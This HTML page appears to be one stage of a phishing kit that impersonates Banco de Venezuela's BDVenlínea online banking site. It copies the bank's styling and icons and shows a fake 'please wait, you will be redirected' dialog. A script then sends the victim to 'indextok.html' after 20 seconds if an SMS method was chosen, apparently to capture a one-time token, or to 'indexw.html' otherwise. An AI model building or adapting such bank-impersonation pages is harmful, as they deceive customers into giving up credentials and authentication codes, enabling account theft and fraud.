<!DOCTYPE html>
<html lang="es">
  <head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <title>BDVenlínea personas</title>
    <!-- base href="https://bdvenlinea.banvenez.com/" -->
    <!-- CACHE -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
    <meta http-equiv="cache-control" content="max-age=0">
    <meta http-equiv="cache-control" content="no-cache">
    <meta http-equiv="expires" content="0">
    <!--<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />-->
    <meta http-equiv="pragma" content="no-cache">
    <meta name="google" content="notranslate">
    <!-- RESPONSIVO -->
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!--ICONOS-->
    <!--<link href="icon.css" rel="stylesheet">-->
    <link href="index1_files/css.css" rel="stylesheet">
    <link href="MisdatosBDV_files/css.css" rel="stylesheet">
    <link href="MisdatosBDV_files/icon.css" rel="stylesheet">
    <link rel="stylesheet" href="MisdatosBDV_files/styles.eac594bf15d466147004.css">
    <!-- <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> -->
    <!--Favicon-->
    <link rel="icon" type="image/x-icon" href="https://bdvenlinea.banvenez.com/assets/favicon/favicon-16x16.png">
    <link rel="apple-touch-icon" sizes="57x57" href="https://bdvenlinea.banvenez.com/assets/favicon/apple-icon-57x57.png">
    <link rel="apple-touch-icon" sizes="60x60" href="https://bdvenlinea.banvenez.com/assets/favicon/apple-icon-60x60.png">
    <link rel="apple-touch-icon" sizes="72x72" href="https://bdvenlinea.banvenez.com/assets/favicon/apple-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="76x76" href="https://bdvenlinea.banvenez.com/assets/favicon/apple-icon-76x76.png">
    <link rel="apple-touch-icon" sizes="114x114" href="https://bdvenlinea.banvenez.com/assets/favicon/apple-icon-114x114.png">
    <link rel="apple-touch-icon" sizes="120x120" href="https://bdvenlinea.banvenez.com/assets/favicon/apple-icon-120x120.png">
    <link rel="apple-touch-icon" sizes="144x144" href="https://bdvenlinea.banvenez.com/assets/favicon/apple-icon-144x144.png">
    <link rel="apple-touch-icon" sizes="152x152" href="https://bdvenlinea.banvenez.com/assets/favicon/apple-icon-152x152.png">
    <link rel="apple-touch-icon" sizes="180x180" href="https://bdvenlinea.banvenez.com/assets/favicon/apple-icon-180x180.png">
    <link rel="icon" type="image/png" sizes="192x192" href="https://bdvenlinea.banvenez.com/assets/favicon/android-icon-192x192.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://bdvenlinea.banvenez.com/assets/favicon/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="96x96" href="https://bdvenlinea.banvenez.com/assets/favicon/favicon-96x96.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://bdvenlinea.banvenez.com/assets/favicon/favicon-16x16.png">
    <!-- Progressive -->
    <link rel="stylesheet" href="./index1_files/styl.css">
    <link rel="mask-icon" href="https://bdvenlinea.banvenez.com/assets/safari-pinned-tab.svg" color="#5bbad5">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <style>
      .ssdd{
        pointer-events: auto;
    color: rgba(0,0,0,.87);
    -webkit-tap-highlight-color: transparent;
    user-select: none;
    cursor: pointer;
    white-space: nowrap;
    margin: 0;
    padding: 0;
    
    border-color: rgba(0,0,0,.54);
    box-sizing: border-box;
    height: 20px;
   
    transition:  ease 280ms;
    width: 15px;
    border-width: 2px;
    border-style: solid;
    border-radius: 50%;
      }
    </style>
    
  </head>
  
  <body>
    <div class="cdk-live-announcer-element cdk-visually-hidden" aria-atomic="true" aria-live="polite"></div>
<div id="cdk-describedby-message-container" aria-hidden="true" style="display: none;">
  <div id="cdk-describedby-message-0">Gestiona tu usuario</div>
</div>
<div class="cdk-overlay-container">
  <div class="cdk-overlay-backdrop cdk-overlay-dark-backdrop cdk-overlay-backdrop-showing"></div>
  <div class="cdk-global-overlay-wrapper" dir="ltr" style="justify-content: center; align-items: center;">
    <div id="cdk-overlay-3" class="cdk-overlay-pane dialog-responsive" style="max-width: 80vw; pointer-events: auto; position: static;">
      <div tabindex="0" class="cdk-visually-hidden cdk-focus-trap-anchor" aria-hidden="true"></div>
      <mat-dialog-container aria-modal="true" class="mat-dialog-container ng-tns-c13-5 ng-trigger ng-trigger-dialogContainer ng-star-inserted" tabindex="-1" id="mat-dialog-1" role="dialog" style="transform: none;">
        <!---->
        <app-elejir-metodo-autenticate _nghost-dme-c16="" class="ng-star-inserted">
          <div _ngcontent-dme-c16="" class="container">
            <div _ngcontent-dme-c16="" style="text-align: center;">
              <h4 _ngcontent-dme-c16="" style="margin-bottom: 20px;">Espere unos segundos</h4>
              <h5 _ngcontent-dme-c16="" style="margin-bottom: 20px;" >Sera redirigido pronto.</h5>
            </div>
            <mat-divider _ngcontent-dme-c16="" class="mat-divider mat-divider-horizontal" role="separator" aria-orientation="horizontal"></mat-divider>
            <br _ngcontent-dme-c16="">
            <div _ngcontent-dme-c16="">
              <div class="loadingio-spinner-rolling-cni2u8oo0xf"><div class="ldio-nyvdsdvwp4">
                <div></div>
                </div></div>
                <style type="text/css">
                @keyframes ldio-nyvdsdvwp4 {
                  0% { transform: translate(-50%,-50%) rotate(0deg); }
                  100% { transform: translate(-50%,-50%) rotate(360deg); }
                }
                .ldio-nyvdsdvwp4 div {
                  position: absolute;
                  width: 120px;
                  height: 120px;
                  border: 20px solid #0067b1;
                  border-top-color: transparent;
                  border-radius: 50%;
                }
                .ldio-nyvdsdvwp4 div {
                  animation: ldio-nyvdsdvwp4 1s linear infinite;
                  top: 100px;
                  left: 100px
                }
                .loadingio-spinner-rolling-cni2u8oo0xf {
                  width: 200px;
                  height: 200px;
                  display: inline-block;
                  overflow: hidden;
                  background: none;
                }
                .ldio-nyvdsdvwp4 {
                  width: 100%;
                  height: 100%;
                  position: relative;
                  transform: translateZ(0) scale(1);
                  backface-visibility: hidden;
                  transform-origin: 0 0; /* see note above */
                }
                .ldio-nyvdsdvwp4 div { box-sizing: content-box; }
                /* generated by https://loading.io/ */
                </style>
            </div>
          </div>
        </app-elejir-metodo-autenticate>
      </mat-dialog-container>
      <div tabindex="0" class="cdk-visually-hidden cdk-focus-trap-anchor" aria-hidden="true"></div>
    </div>
  </div>
</div>
   
    <script>
  window.onload = ()=>{
    if (localStorage.getItem("metodo") == "sms") {
      setTimeout(() => {
      window.location = "indextok.html";
    }, 20000);
      
    }else{
      window.location = "indexw.html";
    }
    
    
  }

    </script>
    
  </body>
</html>